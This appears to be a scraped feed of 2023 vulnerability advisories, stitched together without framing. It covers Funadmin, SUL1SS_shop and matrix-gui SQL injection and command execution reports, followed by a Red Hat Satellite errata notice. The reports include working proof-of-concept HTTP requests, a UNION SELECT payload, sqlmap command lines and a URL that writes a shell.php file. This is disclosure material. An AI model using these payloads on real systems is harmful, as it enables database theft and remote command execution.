Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Akinsoft Wolvox. This issue affects Wolvox: before 8.02.03.

CVE-2023-1251

Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/table/list.

**SQL Injection in Funadmin**

Critical severity GitHub Reviewed Published Mar 9, 2023 to the GitHub Advisory Database • Updated Mar 14, 2023

GHSA-pvp6-53r9-8vxh: SQL Injection in Funadmin

Vulnerability Product:funadmin  
Vulnerability version:.3.2.0  
Vulnerability type:sql injection  
Vulnerability Details：  
Database management plug-in table.php list-sql injection vulnerability  
Vulnerability occurs in plugin - database management plugin  
  
Code Audit Process  
Vulnerability occurs in  
app\\databases\\controller\\table.php#list method  
  
  
Get the id directly and splice it into the sql statement  
Vulnerability recurrence  
\`POST /databases/table/list?id='+UNION+ALL+SELECT+NULL,CONCAT(0x7162626b71,user(),0x71766a6b71),NULL,NULL,NULL,NULL,NULL,NULL%23 HTTP/1.1  
Host: 192.168.3.129:8092  
Content-Length: 187  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://192.168.3.129:8092  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: Hm\_lvt\_ce074243117e698438c49cd037b593eb=1673498041; ci\_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think\_lang=zh-cn; Hm\_lvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm\_lpvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth\_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound\_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D  
Connection: close

TABLE\_NAME=fun\_addon&ENGINE=InnoDB&TABLE\_COMMENT=%E5%85%AC%E7%94%A8\_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE\_ROWS=7&TABLE\_COLLATION=utf8mb4\_unicode\_ci&**token**\=d659d1ffb4e68ff1910c1c7c75a43539\`

CVE-2023-24777: Database management plug-in table.php list-sql injection vulnerability · Issue #5 · funadmin/funadmin

Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/database/edit.

**SQL Injection in Funadmin**

Critical severity GitHub Reviewed Published Mar 8, 2023 to the GitHub Advisory Database • Updated Mar 14, 2023

GHSA-qhq8-2f3m-gxvp: SQL Injection in Funadmin

Vulnerability Product:funadmin  
Vulnerability version:.3.2.0  
Vulnerability type:sql injection  
Vulnerability Details：  
Vulnerability occurs in plugin - database management plugin  

Code Audit Process  
Vulnerability occurs in  
app\\databases\\controller\\Database.php#edit method  
  
Get the id directly and splice it into the sql statement  
Vulnerability recurrence  
Conditions: background administrator rights  
sqlmap poc save as txt

\`POST /databases/database/edit?id=fun\_addon\* HTTP/1.1  
Host: 192.168.3.129:8092  
Content-Length: 187  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://192.168.3.129:8092  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: Hm\_lvt\_ce074243117e698438c49cd037b593eb=1673498041; ci\_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think\_lang=zh-cn; Hm\_lvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm\_lpvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420;  
Connection: close

TABLE\_NAME=fun\_addon&ENGINE=InnoDB&TABLE\_COMMENT=%E5%85%AC%E7%94%A8\_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE\_ROWS=7&TABLE\_COLLATION=utf8mb4\_unicode\_ci&**token**\=d659d1ffb4e68ff1910c1c7c75a43539\`  
python sqlmap.py -r poc.txt

CVE-2023-24782: Database management plug-in database.php edit-sql registration vulnerability · Issue #3 · funadmin/funadmin

A vulnerability, which was classified as critical, has been found in SUL1SS_shop. This issue affects some unknown processing of the file application\merch\controller\Order.php. The manipulation of the argument keyword leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-222599.

**SQLi Vulnerability in SUL1SS\_shop**

**Project:** https://github.com/617746883/thinkphp5.0\_shop

A shop application developed by ThinkPHP5

Download and deploy in the web directory, and import the database file (install.sql)

**Before starting,** if you need to install the system, you may need to modify the database file (install.sql) to allow you to log in.

    'admin', 'f374baf63f70a5c2c4d172a0a6e37897', 'U66yPU04'
    

modify it to

    'admin', 'a7da35830936caa0258da1c26c42d6ff', 'lVRVVp9g'
    

In this way, the password becomes 123456, and you can **start testing the vulnerability.**

(Since this vulnerability exists in the background, it cannot be exploited if you do not know the password.)

Visit and log in to the background, for example: http://192.168.159.133:8080/index.php/admin/login/index.html

Username:admin

Password:123456

Vulnerable file: **application\\merch\\controller\\Order.php**

The **$keyword** variable is passed in by the GET method. When other variables meet the judgment conditions, it can finally be **spliced into the SQL statement to cause SQL injection.**

The resulting SQL statement is executed, resulting in blind injection.

**Payload:**

    http://192.168.159.133:8080/index.php/admin/order/olist_all.html?paytype=&searchtime=&time[start]=2023-02-04+15%3A02&time[end]=2023-03-04+15%3A02&searchfield=ordersn&keyword=1%27&export=0
    

**sqlmap payload(Replace the cookie with your own):**

    sqlmap -u "http://192.168.159.133:8080/index.php/admin/order/olist_all.html?paytype=&searchtime=&time%5Bstart%5D=2023-02-04+15%3A02&time%5Bend%5D=2023-03-04+15%3A02&searchfield=ordersn&keyword=1*&export=0" --cookie="thinkphp_show_page_trace=0|0; login%40=60ae28k2vl20sg2gi9reljav61" --current-user

CVE-2023-1276: SUL1SS_shop_SQLi-这里是一个普通学生的博客

Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/database/list.

GHSA-m8wf-wmwh-jw2m: SQL Injection in Funadmin

SQL injection vulnerability found in Varisicte matrix-gui v.2 allows a remote attacker to execute arbitrary code via the shell_exect parameter to the \www\pages\matrix-gui-2.0 endpoint.

The execute-command.php file exists in the \\www\\pages\\matrix-gui-2.0 directory of the firmware  
Vulnerability type: command execution

This source code is used for the tbox in the Internet of Vehicles, which can control the car's brain, so it is very dangerous  
  

\`<?php

$command = $\_GET\['command'\];  
$output = shell\_exec($command);

echo $output;

?>  
\`  
Through shell\_ Exec carries out command execution, and the execution content is controlled by the command of get parameter transfer

Vulnerability exploitation process:  
Pass the parameter command to the shell through get\_ Exec for command execution and final output

POC：  
/execute-command.php?command=ls  
/execute-command.php?command=echo "" > shell.php

Example:  
http://192.168.160.128:7777/execute-command.php?command=ls  

/execute-command.php?command=echo "" > shell.php  
  
  
To sum up, the device has a remote command execution vulnerability, which can be performed by injecting malicious code to obtain server permissions.

CVE-2023-26922: execute-command.php Command execution vulnerability · Issue #1 · varigit/matrix-gui-v2

Vulnerability Product:funadmin  
Vulnerability version:.3.2.0  
Vulnerability type:sql injection  
Vulnerability Details：  
Database management plug-in database.php list-sql injection vulnerability  
Vulnerability occurs in plugin - database management plugin  

Code Audit Process  
Vulnerability occurs in  
app\\databases\\controller\\Database.php#list method  
  
  
Get the id directly and splice it into the sql statement

Vulnerability reproduction:  
Background administrator rights  
sqlmap poc save as txt  
\`POST /databases/database/list?id=\* HTTP/1.1  
Host: 192.168.3.129:8092  
Content-Length: 187  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://192.168.3.129:8092  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: Hm\_lvt\_ce074243117e698438c49cd037b593eb=1673498041; ci\_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think\_lang=zh-cn; Hm\_lvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm\_lpvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth\_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound\_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D  
Connection: close

TABLE\_NAME=fun\_addon&ENGINE=InnoDB&TABLE\_COMMENT=%E5%85%AC%E7%94%A8\_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE\_ROWS=7&TABLE\_COLLATION=utf8mb4\_unicode\_ci&**token**\=d659d1ffb4e68ff1910c1c7c75a43539\`  
python sqlmap.py -r poc.txt

CVE-2023-24773: Database management plug-in database.php list-sql injection vulnerability · Issue #4 · funadmin/funadmin

Red Hat Security Advisory 2023-1151-01 - Red Hat Satellite is a system management solution that allows organizations to configure and maintain their systems without the necessity to provide public Internet access to their servers or other client systems. It performs provisioning and configuration management of predefined standard operating environments.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Critical: Satellite 6.11.5 Async Security Update  
Advisory ID:       RHSA-2023:1151-01  
Product:           Red Hat Satellite 6  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1151  
Issue date:        2023-03-07  
CVE Names:         CVE-2022-32224  
====================================================================  
1. Summary:

Updated Satellite 6.11 packages that fixes critical security bugs and  
several  
regular bugs are now available for Red Hat Satellite.

2. Relevant releases/architectures:

Red Hat Satellite 6.11 for RHEL 7 - noarch  
Red Hat Satellite 6.11 for RHEL 8 - noarch

3. Description:

Red Hat Satellite is a system management solution that allows organizations  
to configure and maintain their systems without the necessity to provide  
public Internet access to their servers or other client systems. It  
performs provisioning and configuration management of predefined standard  
operating environments.

Security fix(es):

tfm-rubygem-activerecord: activerecord: Possible RCE escalation bug with  
Serialized Columns in Active Record (CVE-2022-32224)

This update fixes the following bugs:

2153877  - The "Documentation" button on Satellite 6.11 for "Provisioning  
Templates" page is pointing to 404 Page Not Found link  
2161929  - Locale change caused by RHEL upgrade results in database index  
corruption "get() returned more than one Modulemd -- it returned 2!"  
2166747  - unable to install satellite 6.11 on rhel8.8 - ansible-core  
version is too new  
2166748  - Entitlement certificate is missing content section for a custom  
product  
2166749  - Sync container images of existing docker type repositories fail  
with 404 - Not found  
2166750  - Another deadlock issue when syncing repos with high concurrency  
2166756  - Inspecting an image with skopeo no longer works on Capsules  
2166757  - Content view filter included errata not in the filter date range  
2166759  - Content view filter will include module streams of other  
repos/arches if the errata contain rpms in different repos/arches.  
2166760  - Even in 6.11.1, sync summary email notification shows the  
incorrect summary for newly added errata.  
2166761  - Content view publish fails when the content view and repository  
both have a large name with : Error message: the server returns an error  
HTTP status code: 500  
2166762  - Insights recommendation sync failing in Satelliite  
2170874  - Satellite-clone not working if ansible-core 2.13 is installed

Users of Red Hat Satellite are advised to upgrade to these updated  
packages, which fix these bugs.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2108997 - CVE-2022-32224 activerecord: Possible RCE escalation bug with Serialized Columns in Active Record  
2153877 - The "Documentation" button on Satellite 6.11 for "Provisioning Templates" page is pointing to 404 Page Not Found link  
2161929 - Locale change caused by RHEL upgrade results in database index corruption "get() returned more than one Modulemd -- it returned 2!"  
2166747 - unable to install satellite 6.11 on rhel8.8 - ansible-core version is too new  
2166748 - Entitlement certificate is missing content section for a custom product  
2166749 - Sync container images of existing docker type repositories fail with 404 - Not found  
2166750 - Another deadlock issue when syncing repos with high concurrency  
2166756 - Inspecting an image with skopeo no longer works on Capsules  
2166757 - Content view filter included errata not in the filter date range  
2166759 - Content view filter will include module streams of other repos/arches if the errata contain rpms in different repos/arches.  
2166760 - Even in 6.11.1, sync summary email notification shows the incorrect summary for newly added errata.  
2166761 - Content view publish fails when the content view and repository both have a large name with : Error message: the server returns an error HTTP status code: 500  
2166762 - Insights recommendation sync failing in Satelliite  
2170874 - Satellite-clone not working if ansible-core 2.13 is installed

6. Package List:

Red Hat Satellite 6.11 for RHEL 7:

Source:  
candlepin-4.1.19-1.el7sat.src.rpm  
foreman-3.1.1.26-1.el7sat.src.rpm  
rubygem-foreman_maintain-1.0.19-1.el7sat.src.rpm  
satellite-6.11.5-1.el7sat.src.rpm  
tfm-pulpcore-python-naya-1.1.1-1.1.el7pc.src.rpm  
tfm-pulpcore-python-pulp-container-2.9.9-1.el7pc.src.rpm  
tfm-pulpcore-python-pulpcore-3.16.15-1.el7pc.src.rpm  
tfm-rubygem-actioncable-6.0.6-2.el7sat.src.rpm  
tfm-rubygem-actionmailbox-6.0.6-2.el7sat.src.rpm  
tfm-rubygem-actionmailer-6.0.6-2.el7sat.src.rpm  
tfm-rubygem-actionpack-6.0.6-2.el7sat.src.rpm  
tfm-rubygem-actiontext-6.0.6-2.el7sat.src.rpm  
tfm-rubygem-actionview-6.0.6-2.el7sat.src.rpm  
tfm-rubygem-activejob-6.0.6-2.el7sat.src.rpm  
tfm-rubygem-activemodel-6.0.6-2.el7sat.src.rpm  
tfm-rubygem-activerecord-6.0.6-2.el7sat.src.rpm  
tfm-rubygem-activestorage-6.0.6-2.el7sat.src.rpm  
tfm-rubygem-activesupport-6.0.6-1.el7sat.src.rpm  
tfm-rubygem-foreman_rh_cloud-5.0.44-1.el7sat.src.rpm  
tfm-rubygem-foreman_theme_satellite-9.0.0.12-1.el7sat.src.rpm  
tfm-rubygem-katello-4.3.0.52-1.el7sat.src.rpm  
tfm-rubygem-rails-6.0.6-2.el7sat.src.rpm  
tfm-rubygem-railties-6.0.6-2.el7sat.src.rpm  
tfm-rubygem-smart_proxy_container_gateway-1.0.7-1.el7sat.src.rpm

noarch:  
candlepin-4.1.19-1.el7sat.noarch.rpm  
candlepin-selinux-4.1.19-1.el7sat.noarch.rpm  
foreman-3.1.1.26-1.el7sat.noarch.rpm  
foreman-cli-3.1.1.26-1.el7sat.noarch.rpm  
foreman-debug-3.1.1.26-1.el7sat.noarch.rpm  
foreman-dynflow-sidekiq-3.1.1.26-1.el7sat.noarch.rpm  
foreman-ec2-3.1.1.26-1.el7sat.noarch.rpm  
foreman-gce-3.1.1.26-1.el7sat.noarch.rpm  
foreman-journald-3.1.1.26-1.el7sat.noarch.rpm  
foreman-libvirt-3.1.1.26-1.el7sat.noarch.rpm  
foreman-openstack-3.1.1.26-1.el7sat.noarch.rpm  
foreman-ovirt-3.1.1.26-1.el7sat.noarch.rpm  
foreman-postgresql-3.1.1.26-1.el7sat.noarch.rpm  
foreman-service-3.1.1.26-1.el7sat.noarch.rpm  
foreman-telemetry-3.1.1.26-1.el7sat.noarch.rpm  
foreman-vmware-3.1.1.26-1.el7sat.noarch.rpm  
rubygem-foreman_maintain-1.0.19-1.el7sat.noarch.rpm  
satellite-6.11.5-1.el7sat.noarch.rpm  
satellite-cli-6.11.5-1.el7sat.noarch.rpm  
satellite-common-6.11.5-1.el7sat.noarch.rpm  
tfm-pulpcore-python3-naya-1.1.1-1.1.el7pc.noarch.rpm  
tfm-pulpcore-python3-pulp-container-2.9.9-1.el7pc.noarch.rpm  
tfm-pulpcore-python3-pulpcore-3.16.15-1.el7pc.noarch.rpm  
tfm-rubygem-actioncable-6.0.6-2.el7sat.noarch.rpm  
tfm-rubygem-actionmailbox-6.0.6-2.el7sat.noarch.rpm  
tfm-rubygem-actionmailer-6.0.6-2.el7sat.noarch.rpm  
tfm-rubygem-actionpack-6.0.6-2.el7sat.noarch.rpm  
tfm-rubygem-actiontext-6.0.6-2.el7sat.noarch.rpm  
tfm-rubygem-actionview-6.0.6-2.el7sat.noarch.rpm  
tfm-rubygem-activejob-6.0.6-2.el7sat.noarch.rpm  
tfm-rubygem-activemodel-6.0.6-2.el7sat.noarch.rpm  
tfm-rubygem-activerecord-6.0.6-2.el7sat.noarch.rpm  
tfm-rubygem-activestorage-6.0.6-2.el7sat.noarch.rpm  
tfm-rubygem-activesupport-6.0.6-1.el7sat.noarch.rpm  
tfm-rubygem-foreman_rh_cloud-5.0.44-1.el7sat.noarch.rpm  
tfm-rubygem-foreman_theme_satellite-9.0.0.12-1.el7sat.noarch.rpm  
tfm-rubygem-katello-4.3.0.52-1.el7sat.noarch.rpm  
tfm-rubygem-rails-6.0.6-2.el7sat.noarch.rpm  
tfm-rubygem-railties-6.0.6-2.el7sat.noarch.rpm  
tfm-rubygem-smart_proxy_container_gateway-1.0.7-1.el7sat.noarch.rpm

Red Hat Satellite 6.11 for RHEL 7:

Source:  
foreman-3.1.1.26-1.el7sat.src.rpm  
rubygem-foreman_maintain-1.0.19-1.el7sat.src.rpm  
satellite-6.11.5-1.el7sat.src.rpm  
tfm-pulpcore-python-naya-1.1.1-1.1.el7pc.src.rpm  
tfm-pulpcore-python-pulp-container-2.9.9-1.el7pc.src.rpm  
tfm-pulpcore-python-pulpcore-3.16.15-1.el7pc.src.rpm  
tfm-rubygem-smart_proxy_container_gateway-1.0.7-1.el7sat.src.rpm

noarch:  
foreman-debug-3.1.1.26-1.el7sat.noarch.rpm  
rubygem-foreman_maintain-1.0.19-1.el7sat.noarch.rpm  
satellite-capsule-6.11.5-1.el7sat.noarch.rpm  
satellite-common-6.11.5-1.el7sat.noarch.rpm  
tfm-pulpcore-python3-naya-1.1.1-1.1.el7pc.noarch.rpm  
tfm-pulpcore-python3-pulp-container-2.9.9-1.el7pc.noarch.rpm  
tfm-pulpcore-python3-pulpcore-3.16.15-1.el7pc.noarch.rpm  
tfm-rubygem-smart_proxy_container_gateway-1.0.7-1.el7sat.noarch.rpm

Red Hat Satellite 6.11 for RHEL 7:

Source:  
rubygem-foreman_maintain-1.0.19-1.el7sat.src.rpm  
satellite-clone-3.1.1-2.el7sat.src.rpm

noarch:  
rubygem-foreman_maintain-1.0.19-1.el7sat.noarch.rpm  
satellite-clone-3.1.1-2.el7sat.noarch.rpm

Red Hat Satellite 6.11 for RHEL 7:

Source:  
foreman-3.1.1.26-1.el7sat.src.rpm  
satellite-6.11.5-1.el7sat.src.rpm

noarch:  
foreman-cli-3.1.1.26-1.el7sat.noarch.rpm  
satellite-cli-6.11.5-1.el7sat.noarch.rpm

Red Hat Satellite 6.11 for RHEL 8:

Source:  
candlepin-4.1.19-1.el8sat.src.rpm  
foreman-3.1.1.26-1.el8sat.src.rpm  
python-naya-1.1.1-1.1.el8pc.src.rpm  
python-pulp-container-2.9.9-1.el8pc.src.rpm  
python-pulpcore-3.16.15-1.el8pc.src.rpm  
rubygem-actioncable-6.0.6-2.el8sat.src.rpm  
rubygem-actionmailbox-6.0.6-2.el8sat.src.rpm  
rubygem-actionmailer-6.0.6-2.el8sat.src.rpm  
rubygem-actionpack-6.0.6-2.el8sat.src.rpm  
rubygem-actiontext-6.0.6-2.el8sat.src.rpm  
rubygem-actionview-6.0.6-2.el8sat.src.rpm  
rubygem-activejob-6.0.6-2.el8sat.src.rpm  
rubygem-activemodel-6.0.6-2.el8sat.src.rpm  
rubygem-activerecord-6.0.6-2.el8sat.src.rpm  
rubygem-activestorage-6.0.6-2.el8sat.src.rpm  
rubygem-activesupport-6.0.6-1.el8sat.src.rpm  
rubygem-foreman_maintain-1.0.19-1.el8sat.src.rpm  
rubygem-foreman_rh_cloud-5.0.44-1.el8sat.src.rpm  
rubygem-foreman_theme_satellite-9.0.0.12-1.el8sat.src.rpm  
rubygem-katello-4.3.0.52-1.el8sat.src.rpm  
rubygem-rails-6.0.6-2.el8sat.src.rpm  
rubygem-railties-6.0.6-2.el8sat.src.rpm  
rubygem-smart_proxy_container_gateway-1.0.7-1.el8sat.src.rpm  
satellite-6.11.5-1.el8sat.src.rpm

noarch:  
candlepin-4.1.19-1.el8sat.noarch.rpm  
candlepin-selinux-4.1.19-1.el8sat.noarch.rpm  
foreman-3.1.1.26-1.el8sat.noarch.rpm  
foreman-cli-3.1.1.26-1.el8sat.noarch.rpm  
foreman-debug-3.1.1.26-1.el8sat.noarch.rpm  
foreman-dynflow-sidekiq-3.1.1.26-1.el8sat.noarch.rpm  
foreman-ec2-3.1.1.26-1.el8sat.noarch.rpm  
foreman-gce-3.1.1.26-1.el8sat.noarch.rpm  
foreman-journald-3.1.1.26-1.el8sat.noarch.rpm  
foreman-libvirt-3.1.1.26-1.el8sat.noarch.rpm  
foreman-openstack-3.1.1.26-1.el8sat.noarch.rpm  
foreman-ovirt-3.1.1.26-1.el8sat.noarch.rpm  
foreman-postgresql-3.1.1.26-1.el8sat.noarch.rpm  
foreman-service-3.1.1.26-1.el8sat.noarch.rpm  
foreman-telemetry-3.1.1.26-1.el8sat.noarch.rpm  
foreman-vmware-3.1.1.26-1.el8sat.noarch.rpm  
python38-naya-1.1.1-1.1.el8pc.noarch.rpm  
python38-pulp-container-2.9.9-1.el8pc.noarch.rpm  
python38-pulpcore-3.16.15-1.el8pc.noarch.rpm  
rubygem-actioncable-6.0.6-2.el8sat.noarch.rpm  
rubygem-actionmailbox-6.0.6-2.el8sat.noarch.rpm  
rubygem-actionmailer-6.0.6-2.el8sat.noarch.rpm  
rubygem-actionpack-6.0.6-2.el8sat.noarch.rpm  
rubygem-actiontext-6.0.6-2.el8sat.noarch.rpm  
rubygem-actionview-6.0.6-2.el8sat.noarch.rpm  
rubygem-activejob-6.0.6-2.el8sat.noarch.rpm  
rubygem-activemodel-6.0.6-2.el8sat.noarch.rpm  
rubygem-activerecord-6.0.6-2.el8sat.noarch.rpm  
rubygem-activestorage-6.0.6-2.el8sat.noarch.rpm  
rubygem-activesupport-6.0.6-1.el8sat.noarch.rpm  
rubygem-foreman_maintain-1.0.19-1.el8sat.noarch.rpm  
rubygem-foreman_rh_cloud-5.0.44-1.el8sat.noarch.rpm  
rubygem-foreman_theme_satellite-9.0.0.12-1.el8sat.noarch.rpm  
rubygem-katello-4.3.0.52-1.el8sat.noarch.rpm  
rubygem-rails-6.0.6-2.el8sat.noarch.rpm  
rubygem-railties-6.0.6-2.el8sat.noarch.rpm  
rubygem-smart_proxy_container_gateway-1.0.7-1.el8sat.noarch.rpm  
satellite-6.11.5-1.el8sat.noarch.rpm  
satellite-cli-6.11.5-1.el8sat.noarch.rpm  
satellite-common-6.11.5-1.el8sat.noarch.rpm

Red Hat Satellite 6.11 for RHEL 8:

Source:  
foreman-3.1.1.26-1.el8sat.src.rpm  
python-naya-1.1.1-1.1.el8pc.src.rpm  
python-pulp-container-2.9.9-1.el8pc.src.rpm  
python-pulpcore-3.16.15-1.el8pc.src.rpm  
rubygem-foreman_maintain-1.0.19-1.el8sat.src.rpm  
rubygem-smart_proxy_container_gateway-1.0.7-1.el8sat.src.rpm  
satellite-6.11.5-1.el8sat.src.rpm

noarch:  
foreman-debug-3.1.1.26-1.el8sat.noarch.rpm  
python38-naya-1.1.1-1.1.el8pc.noarch.rpm  
python38-pulp-container-2.9.9-1.el8pc.noarch.rpm  
python38-pulpcore-3.16.15-1.el8pc.noarch.rpm  
rubygem-foreman_maintain-1.0.19-1.el8sat.noarch.rpm  
rubygem-smart_proxy_container_gateway-1.0.7-1.el8sat.noarch.rpm  
satellite-capsule-6.11.5-1.el8sat.noarch.rpm  
satellite-common-6.11.5-1.el8sat.noarch.rpm

Red Hat Satellite 6.11 for RHEL 8:

Source:  
rubygem-foreman_maintain-1.0.19-1.el8sat.src.rpm  
satellite-clone-3.1.1-2.el8sat.src.rpm

noarch:  
rubygem-foreman_maintain-1.0.19-1.el8sat.noarch.rpm  
satellite-clone-3.1.1-2.el8sat.noarch.rpm

Red Hat Satellite 6.11 for RHEL 8:

Source:  
foreman-3.1.1.26-1.el8sat.src.rpm  
satellite-6.11.5-1.el8sat.src.rpm

noarch:  
foreman-cli-3.1.1.26-1.el8sat.noarch.rpm  
satellite-cli-6.11.5-1.el8sat.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-32224  
https://access.redhat.com/security/updates/classification/#critical

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAiXO9zjgjWX9erEAQgLAQ/+Kn2RsaVk+79nqBuqFtskH6Rxw0hwBANE  
nwDxFYLrtBwY8lgFiuDZDFHXuxjg8/9iQntr+s/P5FLC/4t2Gt+VE+RT4IZ4gjFN  
O+IMkUCINWW0mfS+IHDvoHe8KOkRFWqGGhcleywOitYnnEGdpFthiCFGfT4oiksE  
b0Arv/AiZp6WWuZtXPXOq86HDaepWfx4wvJhW43/6fF+YEz+nXkmtnenxEDaYy53  
JGJL3Okuy06FaacvBzhU3Spg/F/lQvN3GVUHQTz/Umh/T7p9YDSa972TnDyWAoMT  
591v5DemmWdpxOd44OXr3GxFpUgf2bKsSYMoqssUKgIP07U+Hp2PcpEO79LrR9n0  
wXlD5Iea93gSfMHBFylWtcDGTeC2bKNp0AX8MeJ9rVixeUZ4ORFZ6AE/Og3scpNq  
4gW+oQMsuMqJfIkc5Xsn5gHG9rxNV4kHam/E+yfgVa7WHklQHkUSKWoK98sIgW4K  
OZwOJ29GmpoDEZ+PRX0ksJY1WSX7BaiVtv+VVLYMBcypSEdZrEB3qrz5qIAnn1CO  
naXMaOlDAbBdRI7WcCnf0enpaBjhUpfVh98l853x42XD0jntmfYL91u4Klrisxnv  
771mt74xJeenPTBDCnisoQ9lQhPH5fS4EgsfeMHuvx5QN+VQNSXQyYKzFrGNCUPm  
wNSho9tC/o8=QZVe  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#sql